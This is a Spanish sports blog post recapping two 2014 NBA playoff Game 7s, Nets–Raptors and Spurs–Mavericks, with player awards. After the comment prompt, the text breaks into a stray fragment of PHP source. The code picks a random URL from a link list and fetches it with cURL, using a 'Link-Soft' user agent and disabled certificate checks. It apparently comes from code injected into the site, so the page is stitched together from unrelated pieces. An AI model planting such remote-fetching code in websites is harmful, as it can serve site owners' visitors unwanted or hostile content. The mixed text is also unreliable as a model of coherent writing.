La Crónica: Amargas derrotas

05 de May de 2014 por txusma

La noche de los séptimos partidos del sábado tuvo continuidad ayer. Se tenían que resolver las 2 últimas eliminatorias que faltaban de primera ronda y Raptors y Nets fueron los primeros en saltar a la pista. Si en Toronto esperaban que fueran Lowry o DeRozan los que tiraran del carro de un equipo que se encontraba ante una oportunidad única, muy pronto se llevaron un desegaño. Fue Amir Johnson el que, aprovechando la defensa de Paul Pierce, mantuvo a los suyos en el partido durante el primer cuarto. Los canadienses se permitieron el lujo de gozar de alguna ventaja pero al principio del segundo caurto los Nets le dieron la vuelta al marcador y ya no se vieron rebasados por los Raptors en ningún momento. Gozaban de ventajas pequeñas pero con Amir en el banco con problemas de faltas y las empanadas de Lowry, DeRozan y, sobretodo, Valanciunas eran más que suficientes para jugar con tranquilidad. Con 10 puntos de ventaja y la teórica experiencia en estas situaciones que se les supone en estas situaciones, el partido parecía inclinarse defenitivamente a favor de los Nets al principio del último cuarto. Además, Amir era definitivamente eliminado por faltas y Joe Johnson se valía prácticamente él solo para ahogar cualquier intento de reacción canadiense. Pero de repente, unos tiros libres errados  y unos balones perdidos por Deron por aquí, unos tiros fallados por Pierce por allá y un buen acierto desde la línea de tiros libres de los Raptors, convirtió un partido controlado en un partido de los que se deciden en una milésima de segundo. Los Nets eran incapaces de defender las jugadas desesperadas de Toronto y se encontraron, finalmente, un solo punto por encima a falta de 8 segundos y posesión para los canadienses gracias a un robo de Terrence Ross. Tras el saque de banda, la pelota llegó a las manos de Lowry que hizo lo que cualquiera que estuviera viendo el partido sabía que haría: empotrarse contra la defensa de los Nets sin que se la pasara por la cabeza doblar el balón. ¿Resultado? Tapón de Paul Pierce que se redimía algo de sus fallos anteriores (104-103). Los Nets se enfrentarán a unos Heat a los que parecen tener cogida la medida (4-0 en liga regular para los neoyorquinos, ojo) mientras que los Raptors se despiden de su mejor temporada en mucho tiempo. Hay buenos mimbres. Veremos que conejo se saca de la chistera Ujiri. 

El otro partido, que se presentaba apasionante, igualado, emocionante, etc, etc. prácticamente se había acabado al final de primer cuarto al que los Spurs llegaron con 14 puntos de ventaja. A mediados del segundo, la diferencia alcanzó los 29 puntos y Tony Parker andaba ya por los 24. Realmente parecía que los Mavs no se habían enterado de que se estaban jugando el pase a las semifinales de conferencia. De hecho, parecía que estuvieran disputando un partido de pretemporada. En la 2ª parte, Rick Carlisle quemó su último cartucho sacando a pista un quinteto muy pequeño formado por Harris, Calderon, Ellis, Carter y Nowitzki que pareció funcionar en primera instancia ya que  los Mavs redujeron la diferencia hasta los 14 puntos pero tras un tiempo muerto de Popovich los Spurs apretaron de nuevo y no les costó nada volver a conseguir diferencias superiores a los 25 puntos. El último cuarto fue un mero trámite que solo contó con el aliciente de saber si los Spurs se impondrían por más de 30 puntos y a 5 minutos para el final ambos equipos pusieron en pista a los suplentes de los suplentes. Con eso queda todo dicho (96-119). San Antonio ha sudado más de lo esperado en esta primera ronda pero la abandona dando un golpe sobre la mesa que ha resonado en todos los pabellones de la NBA. Por su parte, los Mavs se despiden de una manera amarga. No se merecían semejante correctivo.

PREMIOS

MVP: ¡Vaya exhibición de Tony Parker! El francés destrozó a los Mavs en una primera parte en la que ya les endosó 24 puntos. Acabó el partido con 32 puntos, 4 rebotes y 4 asistencias y porque el encuentro ya estaba sentenciado que sinó vete a saber con cuántos puntos hubiese acabado.

Sorpresa: Marcus Thorton (17 p – 6r) fue un auténtico puñal, una auténtica amenaza en los 20 minutos que estuvo en pista.

Decepción: El juego interior de los Nets no es muy poderoso pero Jonas Valanciunas no fue capaz de aprovecharlo en ningún momento. Partido horrible  del lituano que se quedó en 3 míseros puntos.

Esfuerzo en vano: Amir Johnson sostuvo a los suyos en la primera parte y tuvo que comerse las uñas en el banco en la segunda con problemas de faltas.  Jugó 22 minutos pero tuvo tiempo de anotar 20 puntos y capturar 10 rebotes.

Imágenes | AP Photos / Getty Images

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>